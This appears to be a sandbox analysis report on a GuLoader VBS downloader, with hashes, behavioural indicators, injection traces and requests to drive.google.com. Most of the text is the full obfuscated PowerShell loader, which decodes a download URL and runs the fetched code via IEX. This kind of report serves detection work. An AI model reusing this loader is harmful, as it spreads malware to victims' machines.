guloader | 1b75203f20f668f58a88ef50eea8c11069a9d7563916fff2797a17a3832163eb

General

Target

27618647_EX_CF 135500500T.vbs
Size

33KB
MD5

fe8bafb0fb5adfbcd6c959c4f0b758e8
SHA1

f5f909c9b1adece63e9c68b22d4a823842eb1321
SHA256

9b47a3de7cb8fe46e268bfa95ac81070a4e04c3d0b044a3c2c0376db6f3cb6db
SHA512

94d41408502524f5ad2e67ffac72dfa7c94c5a3e8183aa721ed5be8c0de106e5cb3549b0a86e5ebf2484ea1512ec440d737ee5d47c8683b1a0b1d794caef45e8
SSDEEP

384:Z9vOg3jzCxmiJGRvgGY8celmjLOz7uNnPKwvnX98vuR/k9UK:Zp3jZiJGxO8czLkSVJ9nWx

Score

10^/10

guloader discovery downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2196	powershell.exe
7	2196	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2936	wabmig.exe
2936	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2708	powershell.exe
2936	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2708 set thread context of 2936	2708	powershell.exe	38

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2708	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2196	powershell.exe
2708	powershell.exe
2708	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2708	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2936	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 1960 wrote to memory of 2196	1960	WScript.exe	31
PID 1960 wrote to memory of 2196	1960	WScript.exe	31
PID 1960 wrote to memory of 2196	1960	WScript.exe	31
PID 2196 wrote to memory of 2832	2196	powershell.exe	33
PID 2196 wrote to memory of 2832	2196	powershell.exe	33
PID 2196 wrote to memory of 2832	2196	powershell.exe	33
PID 2196 wrote to memory of 2656	2196	powershell.exe	35
PID 2196 wrote to memory of 2656	2196	powershell.exe	35
PID 2196 wrote to memory of 2656	2196	powershell.exe	35
PID 2656 wrote to memory of 2708	2656	cmd.exe	36
PID 2656 wrote to memory of 2708	2656	cmd.exe	36
PID 2656 wrote to memory of 2708	2656	cmd.exe	36
PID 2656 wrote to memory of 2708	2656	cmd.exe	36
PID 2708 wrote to memory of 2668	2708	powershell.exe	37
PID 2708 wrote to memory of 2668	2708	powershell.exe	37
PID 2708 wrote to memory of 2668	2708	powershell.exe	37
PID 2708 wrote to memory of 2668	2708	powershell.exe	37
PID 2708 wrote to memory of 2936	2708	powershell.exe	38
PID 2708 wrote to memory of 2936	2708	powershell.exe	38
PID 2708 wrote to memory of 2936	2708	powershell.exe	38
PID 2708 wrote to memory of 2936	2708	powershell.exe	38
PID 2708 wrote to memory of 2936	2708	powershell.exe	38
PID 2708 wrote to memory of 2936	2708	powershell.exe	38

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\27618647_EX_CF 135500500T.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Aftvingelsens Unfollowed Smaragd Ventrolateral Millivoltmetres Stknings #>;$Solfaldsskrenes='Reserveringsdokument';<#rundsprgets Nontautological Venstrefljsfraktioner #>;$Unobeyed=$host.PrivateData;If ($Unobeyed) {$Doucherne++;}function Ydmyg($Gstevrelserne198){$Numbfishes=$Gstevrelserne198.Length-$Doucherne;for( $Galmyg=5;$Galmyg -lt $Numbfishes;$Galmyg+=6){$Storybook+=$Gstevrelserne198[$Galmyg];}$Storybook;}function Vakuumpakkede($Unlasting){ & ($Balds) ($Unlasting);}$Fritnkeres=Ydmyg 'S,ranM BlomoJets,zSp jli ForslSkil lAnginauntee/C.jas5.orre.Mechl0Midso Tyran(VrvleWBrandi Ch,qn StradSuc.eoArgumwArabis ulde SkafnNFabulTMaer Likvi1Assis0 Regn. Grad0D mih;Fallo hype W UnhiiEndodnRe.ol6 Un a4 orde;,ampo Formx H,pp6 Be,b4Overq;Bag t Spat.r Ove v ontr:Aan s1beadl2 onad1 fest.Leve 0Unnet) uffe FlitGTranseAncilc TsarkC penodecim/Print2Igitu0Fi,ta1Straf0Mnevi0Skrue1 Cris0Ginge1Tors KalkyFFil.niTrofarElskeeBe.egfBank.oOmbinxNonse/Udt.n1Salep2 Eneh1Udskr.Svi a0Semia ';$Storesstrenes=Ydmyg 'VasalURenhasdek,ne ohmar Prin- Su naRad.ogaustrEFour NUnabotProt. ';$Depark=Ydmyg 'BisonhDe irtSpicutBabelp Dy lsSiph,:Bermu/Fl.ki/callodBlo srFrydeiSu sevAscomeSynth.VarmegPladeoForuno Igl.gAdvoklSpendeellip.Testicproclo UdskmLimbe/Ordreu Nagecmorge?Cent eTragtxVinkepcollaoopgavr OrgatRotte= SkrndF revoPlse wBl dlnAbonnlSolidoVegneaizzytdKriti&IndplibefstdPrivi= M ga1Peach6 TanghButtoRUdaan-C andKLustrSSkott_MesmeQGunhiX Uskam SworCMudbtBCochlBDeklaCBaronA.mbro5 Soul_H dsesA rmaGLaaneFR menvEmancdT llin opulGtvesyxShoweISwingi ilbagRub i9Plad,1St rt6 topizLeggi ';$Kegleflades28=Ydmyg ' ini>Omdeb ';$Balds=Ydmyg 'SkemaIMedlie BetoXSynt ';$Meiner='kittatinny';$Effulgence = Ydmyg 'TilsteDi incHjmeshTast o Quea Fo fr%PrognaNyrelpMejnepCyn pdThe ta YhwhtfjernaAquil%Inf t\Wit.foVoksevSelgeeTetr rErhvebMisharTemploHofdaaSulcud dfly.balmiAForkvlPrisseNonce Proi&Nonva&Fires TangeeCrinkcAfgifh TudioVelf. St detChoi ';Vakuumpakkede (Ydmyg ' Norr$ G,ldgPseudlpillsoAssu bPla taChalclUnco :LiberBCow iiAwaynlRed vi GuldmTa,aceMyrn nslvsmt Besp2 Dile5Remo 3U int=Parat(.icercDefekmforttdAlaud Bav n/Pseudc C ee Clavi$ pareE BedlfPreplf HusmuSheeplHydrogCopp ethuggn rffec drnleH ari)Wildi ');Vakuumpakkede (Ydmyg 'O rik$GuessgWistol AcceoAnsigbSajouaHaandlSlage:SprreTKonfirRecepaFagm.gB,eedeOp isdPrefoi BdefaLagganCrusa=Subah$ B.deDSemite Preep ActiaLacewr TernkKomm .Omkoms h ggpKoretlS rhaiMeasutForen(Sympa$StrenKGejleewa neg M rrlTerm eSndagfouverlInko.aGladidBro geOuttrsIma m2Efter8Borge) St p ');Vakuumpakkede (Ydmyg 'ko yp[Gal.aN BlleeGeo itRet,n.BordsSEnkele StavrFore vBete,i SkolcHueleeCapitPSurfyoTube iConfinTrillt iskMsvberafor.enBo.haaUnc,ugVersie RelarIa tt]scour: Kon.:FarveS mylieFarvec EdviuMoldsrJgerki revltTr.fiyawatcP ristrR guloectoptMa.oro ubsicFogedoConf lBl,nc Afvik=Misst Rese,[Unsu NTrstee IsaftScyth. Lat S GenseSnorec RigeuRep ir MultiTatovtGrib yIncu PPartirNo mao Beskt ropao Uni cOmsteoMicrol OpkbTSlutsy LrerpI stre untr]indu : npro:B.athT Am rlSeed,sTilra1 ette2Laer ');$Depark=$Tragedian[0];$Vowelled= (Ydmyg 'delsi$U,derG Lun lHug lOBlowzbAffyrAEbonpLUnfro: SpisBAmpulYradiopBesgsa tel.SReforsUndereCobcaRTalje= InveNPrincEReforwRetsi-KalkuOIntrab versjPackeEtarticLeucoTSwaps UnionSUnr.byAstigsTumbrTStjulEkntreM.utan.PosolnBilleEPatert kot.sieniwLut cEInd aBPseudc FordlMyrrhIAndreEHaut,n aadeT');$Vowelled+=$Biliment253[1];Vakuumpakkede ($Vowelled);Vakuumpakkede (Ydmyg 'Fuld,$S yribPang yOrgelpRundpaTolb.sDubb,sArbe eJ,rdbrIndek.Ta,arHspis.e Terma HovedLyknseMootrrP stvs orgj[,ulci$ depaS SammtPara.oThorarAdhi.ePrebrs Yonks Alimt Fr.mriso heSu.cinMuonieHa rssHulni]Gjord=Doves$ FeltFUlveur BereiSvarltImpasnD llakTilkmeCirc rBlgegeHunhusB,myn ');$Korridoren=Ydmyg 'Nigh.$underbSe sryTnkbapP theaStokesLive sNa,lhe MikirStrop.InterD GrafoBdekrwImpednforsglSagfroLejekah,anddMavieFFordyiPredel Birke Stri(Ers a$ sejrDSurmieEstmapPochea ,eger uns kTolds, Pros$ A snS T relA,tvieBorgeeekspepForplwBe,enaFnblgr Br,ddStram)Lymph ';$Sleepward=$Biliment253[0];Vakuumpakkede (Ydmyg 'Sepia$ObligGP,nsilForenoL beabLinieaChumsLCrumm:A gumb De uRLoopboe elaBKvittyYder GSk ftgS.nboEprogeRFreewI,edics ta r=D asp(TaaletD ftoe EngaSRnnerT Risi-FtterpAlarmA Sko tamet HTigri Halvt$ ilds,ephoLpolitEP nineStandPCitraWSulfia FyldRfishbDResc )Tacho ');while (!$Brobyggeris) {Vakuumpakkede (Ydmyg 'Ejler$Unsecg ypholHi keo PropbGuy,naAmortlLe,id:AtherCKostfovandsnAlb nfClerieunox rVrvl r O,eai H llnBa oig Fre = Boos$Medi tGryderRevisu A,ghe ,ara ') ;Vakuumpakkede $Korridoren;Vakuumpakkede (Ydmyg 'Subd SSwa.ttKrikkaGastrr enket Diss-w ltsSDia,rlAf,rieinchaeDrivep,olon Topas4Papio ');Vakuumpakkede (Ydmyg 'St ft$SallegBogkllBd seoM srgbForsta orslConvo:ElektBVr.iprPseu oAxi lbRetdgyHyperg LovlgForsveExtorrBle.si hiosUnsla=Pic o( NotcTGlycoe BarksDukketParap-Ma kiP KrseaRaastt ,ordh.ordl Efter$ AnimSvansklHecateBryggeInaidpfremlwLentiape rir Enand agid)O.ert ') ;Vakuumpakkede (Ydmyg 'Ovula$FolkegTermilUbemroSel.rb MejkaIn lalFlowe:TribuATetrauPlatetSonfooSti liV rgimAudshm SnipuLappsnhalvtiNand tGlycoiDod.neP ocisNonme= sn.d$HolmggafkrvlRectioUn kebForhaaOm tdlpleni:Tottepdevesr orreeCaenofRent eRister Ryget ydroiFib ol Bluee Dobb+Ar dl+Kalkk%Doeet$SttteTconnur Achra UnengGre seNonpedFors.iMauriaKnkbrnStaf .Sp jtcWearioA.resu Ko cnstam.tFerga ') ;$Depark=$Tragedian[$Autoimmunities];}$Triller=307742;$Selvoptagede=28946;Vakuumpakkede (Ydmyg ' Chon$ CordgHjemml TranoDealeb p unaPunitlB nep: Ur gHDdskrgKondoeProdunReakts iven S lan=Ledsa VideGBlitzekastrtFas s-KriseCLitteoNedmenA viktNonvieUsa rnVelettNonad Tegul$N nfaSAfv.gl snafeOrdree tillp Tu twMusikaSkruer N ncdKirke ');Vakuumpakkede (Ydmyg 'Langl$DslengMinerlSuperoIt,rabAffila Fidul Wull: PlasSBefa pMallelEnh de,allenNonreiBefolabrus lhyper Relis=Banep Nonev[TyrolSKvalsyReaumsTopsttSmu keUd inmVis i.PortiCUnderoBest n LandvVindpeDrfljr musltunco ] rjhe:Ste.e:Ox irF KejsrYomeroBeslumUn erBJokeyaN nnes HigueTrs e6Forh 4PopopSTubertMesiarVolhyiKompan neckgLoco (Dagbd$PatarH ForegResigeSpr cn Klepsproth)Finde ');Vakuumpakkede (Ydmyg 'Conve$At engCareel TegnoTaljebG egoa S,mllVigan:F emsSMalleeScythmKi,deiDisk,o revir JustiW sogeErs anV ndat Polya ollel SulplPearlysu op T lla=b oms s inh[Skiv SStikfyS alosBarnetHarnieBondlmS atb.TophaTPytteeRifl,x ,lyptNep.r.FirtaEVsenenDam,fcHon yo Sub d G.aviDebatnVelgagStrae] Mas.:Sa me:SutteADigebSBr,frCSpektI reetIAbras.CorreG .ugeeFarvetReslaSChim tSto arGrundiMoorpnPara g kits(Holos$regnsSOrthop Velbl Heele F ownTaenaiIordeaVesi l Opst)Arise ');Vakuumpakkede (Ydmyg ' Unpa$Refugg phenlJacquo.retwb C tlaSv inlHelti:OutsaWDem niTrists marehLkkesm BindaMedisyDrogo=Oprr $ AfbrSCirk,e SupemPerchiSorbeoF.therc,nesi ,elseReklanBeryltcol oaBroo,l afbilDebusyH,xas. NavisBlackuFl,egbtrvl sJou ht Unapr ScutiAmtranMilengBundg(O dmn$StikiTTokyor RectiB llalA arilCran eEnspnrEnkef,Grain$ProweS Angie pocl Sn kvGanofoCystopSnydet harmamesosgUdsteeFo gidUteroe Befo)Aswai ');Vakuumpakkede $Wishmay;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2196
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\overbroad.Ale && echo t"
    3⤵
    PID:2832
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Aftvingelsens Unfollowed Smaragd Ventrolateral Millivoltmetres Stknings #>;$Solfaldsskrenes='Reserveringsdokument';<#rundsprgets Nontautological Venstrefljsfraktioner #>;$Unobeyed=$host.PrivateData;If ($Unobeyed) {$Doucherne++;}function Ydmyg($Gstevrelserne198){$Numbfishes=$Gstevrelserne198.Length-$Doucherne;for( $Galmyg=5;$Galmyg -lt $Numbfishes;$Galmyg+=6){$Storybook+=$Gstevrelserne198[$Galmyg];}$Storybook;}function Vakuumpakkede($Unlasting){ & ($Balds) ($Unlasting);}$Fritnkeres=Ydmyg 'S,ranM BlomoJets,zSp jli ForslSkil lAnginauntee/C.jas5.orre.Mechl0Midso Tyran(VrvleWBrandi Ch,qn StradSuc.eoArgumwArabis ulde SkafnNFabulTMaer Likvi1Assis0 Regn. Grad0D mih;Fallo hype W UnhiiEndodnRe.ol6 Un a4 orde;,ampo Formx H,pp6 Be,b4Overq;Bag t Spat.r Ove v ontr:Aan s1beadl2 onad1 fest.Leve 0Unnet) uffe FlitGTranseAncilc TsarkC penodecim/Print2Igitu0Fi,ta1Straf0Mnevi0Skrue1 Cris0Ginge1Tors KalkyFFil.niTrofarElskeeBe.egfBank.oOmbinxNonse/Udt.n1Salep2 Eneh1Udskr.Svi a0Semia ';$Storesstrenes=Ydmyg 'VasalURenhasdek,ne ohmar Prin- Su naRad.ogaustrEFour NUnabotProt. ';$Depark=Ydmyg 'BisonhDe irtSpicutBabelp Dy lsSiph,:Bermu/Fl.ki/callodBlo srFrydeiSu sevAscomeSynth.VarmegPladeoForuno Igl.gAdvoklSpendeellip.Testicproclo UdskmLimbe/Ordreu Nagecmorge?Cent eTragtxVinkepcollaoopgavr OrgatRotte= SkrndF revoPlse wBl dlnAbonnlSolidoVegneaizzytdKriti&IndplibefstdPrivi= M ga1Peach6 TanghButtoRUdaan-C andKLustrSSkott_MesmeQGunhiX Uskam SworCMudbtBCochlBDeklaCBaronA.mbro5 Soul_H dsesA rmaGLaaneFR menvEmancdT llin opulGtvesyxShoweISwingi ilbagRub i9Plad,1St rt6 topizLeggi ';$Kegleflades28=Ydmyg ' ini>Omdeb ';$Balds=Ydmyg 'SkemaIMedlie BetoXSynt ';$Meiner='kittatinny';$Effulgence = Ydmyg 'TilsteDi incHjmeshTast o Quea Fo fr%PrognaNyrelpMejnepCyn pdThe ta YhwhtfjernaAquil%Inf t\Wit.foVoksevSelgeeTetr rErhvebMisharTemploHofdaaSulcud dfly.balmiAForkvlPrisseNonce Proi&Nonva&Fires TangeeCrinkcAfgifh TudioVelf. St detChoi ';Vakuumpakkede (Ydmyg ' Norr$ G,ldgPseudlpillsoAssu bPla taChalclUnco :LiberBCow iiAwaynlRed vi GuldmTa,aceMyrn nslvsmt Besp2 Dile5Remo 3U int=Parat(.icercDefekmforttdAlaud Bav n/Pseudc C ee Clavi$ pareE BedlfPreplf HusmuSheeplHydrogCopp ethuggn rffec drnleH ari)Wildi ');Vakuumpakkede (Ydmyg 'O rik$GuessgWistol AcceoAnsigbSajouaHaandlSlage:SprreTKonfirRecepaFagm.gB,eedeOp isdPrefoi BdefaLagganCrusa=Subah$ B.deDSemite Preep ActiaLacewr TernkKomm .Omkoms h ggpKoretlS rhaiMeasutForen(Sympa$StrenKGejleewa neg M rrlTerm eSndagfouverlInko.aGladidBro geOuttrsIma m2Efter8Borge) St p ');Vakuumpakkede (Ydmyg 'ko yp[Gal.aN BlleeGeo itRet,n.BordsSEnkele StavrFore vBete,i SkolcHueleeCapitPSurfyoTube iConfinTrillt iskMsvberafor.enBo.haaUnc,ugVersie RelarIa tt]scour: Kon.:FarveS mylieFarvec EdviuMoldsrJgerki revltTr.fiyawatcP ristrR guloectoptMa.oro ubsicFogedoConf lBl,nc Afvik=Misst Rese,[Unsu NTrstee IsaftScyth. Lat S GenseSnorec RigeuRep ir MultiTatovtGrib yIncu PPartirNo mao Beskt ropao Uni cOmsteoMicrol OpkbTSlutsy LrerpI stre untr]indu : npro:B.athT Am rlSeed,sTilra1 ette2Laer ');$Depark=$Tragedian[0];$Vowelled= (Ydmyg 'delsi$U,derG Lun lHug lOBlowzbAffyrAEbonpLUnfro: SpisBAmpulYradiopBesgsa tel.SReforsUndereCobcaRTalje= InveNPrincEReforwRetsi-KalkuOIntrab versjPackeEtarticLeucoTSwaps UnionSUnr.byAstigsTumbrTStjulEkntreM.utan.PosolnBilleEPatert kot.sieniwLut cEInd aBPseudc FordlMyrrhIAndreEHaut,n aadeT');$Vowelled+=$Biliment253[1];Vakuumpakkede ($Vowelled);Vakuumpakkede (Ydmyg 'Fuld,$S yribPang yOrgelpRundpaTolb.sDubb,sArbe eJ,rdbrIndek.Ta,arHspis.e Terma HovedLyknseMootrrP stvs orgj[,ulci$ depaS SammtPara.oThorarAdhi.ePrebrs Yonks Alimt Fr.mriso heSu.cinMuonieHa rssHulni]Gjord=Doves$ FeltFUlveur BereiSvarltImpasnD llakTilkmeCirc rBlgegeHunhusB,myn ');$Korridoren=Ydmyg 'Nigh.$underbSe sryTnkbapP theaStokesLive sNa,lhe MikirStrop.InterD GrafoBdekrwImpednforsglSagfroLejekah,anddMavieFFordyiPredel Birke Stri(Ers a$ sejrDSurmieEstmapPochea ,eger uns kTolds, Pros$ A snS T relA,tvieBorgeeekspepForplwBe,enaFnblgr Br,ddStram)Lymph ';$Sleepward=$Biliment253[0];Vakuumpakkede (Ydmyg 'Sepia$ObligGP,nsilForenoL beabLinieaChumsLCrumm:A gumb De uRLoopboe elaBKvittyYder GSk ftgS.nboEprogeRFreewI,edics ta r=D asp(TaaletD ftoe EngaSRnnerT Risi-FtterpAlarmA Sko tamet HTigri Halvt$ ilds,ephoLpolitEP nineStandPCitraWSulfia FyldRfishbDResc )Tacho ');while (!$Brobyggeris) {Vakuumpakkede (Ydmyg 'Ejler$Unsecg ypholHi keo PropbGuy,naAmortlLe,id:AtherCKostfovandsnAlb nfClerieunox rVrvl r O,eai H llnBa oig Fre = Boos$Medi tGryderRevisu A,ghe ,ara ') ;Vakuumpakkede $Korridoren;Vakuumpakkede (Ydmyg 'Subd SSwa.ttKrikkaGastrr enket Diss-w ltsSDia,rlAf,rieinchaeDrivep,olon Topas4Papio ');Vakuumpakkede (Ydmyg 'St ft$SallegBogkllBd seoM srgbForsta orslConvo:ElektBVr.iprPseu oAxi lbRetdgyHyperg LovlgForsveExtorrBle.si hiosUnsla=Pic o( NotcTGlycoe BarksDukketParap-Ma kiP KrseaRaastt ,ordh.ordl Efter$ AnimSvansklHecateBryggeInaidpfremlwLentiape rir Enand agid)O.ert ') ;Vakuumpakkede (Ydmyg 'Ovula$FolkegTermilUbemroSel.rb MejkaIn lalFlowe:TribuATetrauPlatetSonfooSti liV rgimAudshm SnipuLappsnhalvtiNand tGlycoiDod.neP ocisNonme= sn.d$HolmggafkrvlRectioUn kebForhaaOm tdlpleni:Tottepdevesr orreeCaenofRent eRister Ryget ydroiFib ol Bluee Dobb+Ar dl+Kalkk%Doeet$SttteTconnur Achra UnengGre seNonpedFors.iMauriaKnkbrnStaf .Sp jtcWearioA.resu Ko cnstam.tFerga ') ;$Depark=$Tragedian[$Autoimmunities];}$Triller=307742;$Selvoptagede=28946;Vakuumpakkede (Ydmyg ' Chon$ CordgHjemml TranoDealeb p unaPunitlB nep: Ur gHDdskrgKondoeProdunReakts iven S lan=Ledsa VideGBlitzekastrtFas s-KriseCLitteoNedmenA viktNonvieUsa rnVelettNonad Tegul$N nfaSAfv.gl snafeOrdree tillp Tu twMusikaSkruer N ncdKirke ');Vakuumpakkede (Ydmyg 'Langl$DslengMinerlSuperoIt,rabAffila Fidul Wull: PlasSBefa pMallelEnh de,allenNonreiBefolabrus lhyper Relis=Banep Nonev[TyrolSKvalsyReaumsTopsttSmu keUd inmVis i.PortiCUnderoBest n LandvVindpeDrfljr musltunco ] rjhe:Ste.e:Ox irF KejsrYomeroBeslumUn erBJokeyaN nnes HigueTrs e6Forh 4PopopSTubertMesiarVolhyiKompan neckgLoco (Dagbd$PatarH ForegResigeSpr cn Klepsproth)Finde ');Vakuumpakkede (Ydmyg 'Conve$At engCareel TegnoTaljebG egoa S,mllVigan:F emsSMalleeScythmKi,deiDisk,o revir JustiW sogeErs anV ndat Polya ollel SulplPearlysu op T lla=b oms s inh[Skiv SStikfyS alosBarnetHarnieBondlmS atb.TophaTPytteeRifl,x ,lyptNep.r.FirtaEVsenenDam,fcHon yo Sub d G.aviDebatnVelgagStrae] Mas.:Sa me:SutteADigebSBr,frCSpektI reetIAbras.CorreG .ugeeFarvetReslaSChim tSto arGrundiMoorpnPara g kits(Holos$regnsSOrthop Velbl Heele F ownTaenaiIordeaVesi l Opst)Arise ');Vakuumpakkede (Ydmyg ' Unpa$Refugg phenlJacquo.retwb C tlaSv inlHelti:OutsaWDem niTrists marehLkkesm BindaMedisyDrogo=Oprr $ AfbrSCirk,e SupemPerchiSorbeoF.therc,nesi ,elseReklanBeryltcol oaBroo,l afbilDebusyH,xas. NavisBlackuFl,egbtrvl sJou ht Unapr ScutiAmtranMilengBundg(O dmn$StikiTTokyor RectiB llalA arilCran eEnspnrEnkef,Grain$ProweS Angie pocl Sn kvGanofoCystopSnydet harmamesosgUdsteeFo gidUteroe Befo)Aswai ');Vakuumpakkede $Wishmay;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2656
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Aftvingelsens Unfollowed Smaragd Ventrolateral Millivoltmetres Stknings #>;$Solfaldsskrenes='Reserveringsdokument';<#rundsprgets Nontautological Venstrefljsfraktioner #>;$Unobeyed=$host.PrivateData;If ($Unobeyed) {$Doucherne++;}function Ydmyg($Gstevrelserne198){$Numbfishes=$Gstevrelserne198.Length-$Doucherne;for( $Galmyg=5;$Galmyg -lt $Numbfishes;$Galmyg+=6){$Storybook+=$Gstevrelserne198[$Galmyg];}$Storybook;}function Vakuumpakkede($Unlasting){ & ($Balds) ($Unlasting);}$Fritnkeres=Ydmyg 'S,ranM BlomoJets,zSp jli ForslSkil lAnginauntee/C.jas5.orre.Mechl0Midso Tyran(VrvleWBrandi Ch,qn StradSuc.eoArgumwArabis ulde SkafnNFabulTMaer Likvi1Assis0 Regn. Grad0D mih;Fallo hype W UnhiiEndodnRe.ol6 Un a4 orde;,ampo Formx H,pp6 Be,b4Overq;Bag t Spat.r Ove v ontr:Aan s1beadl2 onad1 fest.Leve 0Unnet) uffe FlitGTranseAncilc TsarkC penodecim/Print2Igitu0Fi,ta1Straf0Mnevi0Skrue1 Cris0Ginge1Tors KalkyFFil.niTrofarElskeeBe.egfBank.oOmbinxNonse/Udt.n1Salep2 Eneh1Udskr.Svi a0Semia ';$Storesstrenes=Ydmyg 'VasalURenhasdek,ne ohmar Prin- Su naRad.ogaustrEFour NUnabotProt. ';$Depark=Ydmyg 'BisonhDe irtSpicutBabelp Dy lsSiph,:Bermu/Fl.ki/callodBlo srFrydeiSu sevAscomeSynth.VarmegPladeoForuno Igl.gAdvoklSpendeellip.Testicproclo UdskmLimbe/Ordreu Nagecmorge?Cent eTragtxVinkepcollaoopgavr OrgatRotte= SkrndF revoPlse wBl dlnAbonnlSolidoVegneaizzytdKriti&IndplibefstdPrivi= M ga1Peach6 TanghButtoRUdaan-C andKLustrSSkott_MesmeQGunhiX Uskam SworCMudbtBCochlBDeklaCBaronA.mbro5 Soul_H dsesA rmaGLaaneFR menvEmancdT llin opulGtvesyxShoweISwingi ilbagRub i9Plad,1St rt6 topizLeggi ';$Kegleflades28=Ydmyg ' ini>Omdeb ';$Balds=Ydmyg 'SkemaIMedlie BetoXSynt ';$Meiner='kittatinny';$Effulgence = Ydmyg 'TilsteDi incHjmeshTast o Quea Fo fr%PrognaNyrelpMejnepCyn pdThe ta YhwhtfjernaAquil%Inf t\Wit.foVoksevSelgeeTetr rErhvebMisharTemploHofdaaSulcud dfly.balmiAForkvlPrisseNonce Proi&Nonva&Fires TangeeCrinkcAfgifh TudioVelf. St detChoi ';Vakuumpakkede (Ydmyg ' Norr$ G,ldgPseudlpillsoAssu bPla taChalclUnco :LiberBCow iiAwaynlRed vi GuldmTa,aceMyrn nslvsmt Besp2 Dile5Remo 3U int=Parat(.icercDefekmforttdAlaud Bav n/Pseudc C ee Clavi$ pareE BedlfPreplf HusmuSheeplHydrogCopp ethuggn rffec drnleH ari)Wildi ');Vakuumpakkede (Ydmyg 'O rik$GuessgWistol AcceoAnsigbSajouaHaandlSlage:SprreTKonfirRecepaFagm.gB,eedeOp isdPrefoi BdefaLagganCrusa=Subah$ B.deDSemite Preep ActiaLacewr TernkKomm .Omkoms h ggpKoretlS rhaiMeasutForen(Sympa$StrenKGejleewa neg M rrlTerm eSndagfouverlInko.aGladidBro geOuttrsIma m2Efter8Borge) St p ');Vakuumpakkede (Ydmyg 'ko yp[Gal.aN BlleeGeo itRet,n.BordsSEnkele StavrFore vBete,i SkolcHueleeCapitPSurfyoTube iConfinTrillt iskMsvberafor.enBo.haaUnc,ugVersie RelarIa tt]scour: Kon.:FarveS mylieFarvec EdviuMoldsrJgerki revltTr.fiyawatcP ristrR guloectoptMa.oro ubsicFogedoConf lBl,nc Afvik=Misst Rese,[Unsu NTrstee IsaftScyth. Lat S GenseSnorec RigeuRep ir MultiTatovtGrib yIncu PPartirNo mao Beskt ropao Uni cOmsteoMicrol OpkbTSlutsy LrerpI stre untr]indu : npro:B.athT Am rlSeed,sTilra1 ette2Laer ');$Depark=$Tragedian[0];$Vowelled= (Ydmyg 'delsi$U,derG Lun lHug lOBlowzbAffyrAEbonpLUnfro: SpisBAmpulYradiopBesgsa tel.SReforsUndereCobcaRTalje= InveNPrincEReforwRetsi-KalkuOIntrab versjPackeEtarticLeucoTSwaps UnionSUnr.byAstigsTumbrTStjulEkntreM.utan.PosolnBilleEPatert kot.sieniwLut cEInd aBPseudc FordlMyrrhIAndreEHaut,n aadeT');$Vowelled+=$Biliment253[1];Vakuumpakkede ($Vowelled);Vakuumpakkede (Ydmyg 'Fuld,$S yribPang yOrgelpRundpaTolb.sDubb,sArbe eJ,rdbrIndek.Ta,arHspis.e Terma HovedLyknseMootrrP stvs orgj[,ulci$ depaS SammtPara.oThorarAdhi.ePrebrs Yonks Alimt Fr.mriso heSu.cinMuonieHa rssHulni]Gjord=Doves$ FeltFUlveur BereiSvarltImpasnD llakTilkmeCirc rBlgegeHunhusB,myn ');$Korridoren=Ydmyg 'Nigh.$underbSe sryTnkbapP theaStokesLive sNa,lhe MikirStrop.InterD GrafoBdekrwImpednforsglSagfroLejekah,anddMavieFFordyiPredel Birke Stri(Ers a$ sejrDSurmieEstmapPochea ,eger uns kTolds, Pros$ A snS T relA,tvieBorgeeekspepForplwBe,enaFnblgr Br,ddStram)Lymph ';$Sleepward=$Biliment253[0];Vakuumpakkede (Ydmyg 'Sepia$ObligGP,nsilForenoL beabLinieaChumsLCrumm:A gumb De uRLoopboe elaBKvittyYder GSk ftgS.nboEprogeRFreewI,edics ta r=D asp(TaaletD ftoe EngaSRnnerT Risi-FtterpAlarmA Sko tamet HTigri Halvt$ ilds,ephoLpolitEP nineStandPCitraWSulfia FyldRfishbDResc )Tacho ');while (!$Brobyggeris) {Vakuumpakkede (Ydmyg 'Ejler$Unsecg ypholHi keo PropbGuy,naAmortlLe,id:AtherCKostfovandsnAlb nfClerieunox rVrvl r O,eai H llnBa oig Fre = Boos$Medi tGryderRevisu A,ghe ,ara ') ;Vakuumpakkede $Korridoren;Vakuumpakkede (Ydmyg 'Subd 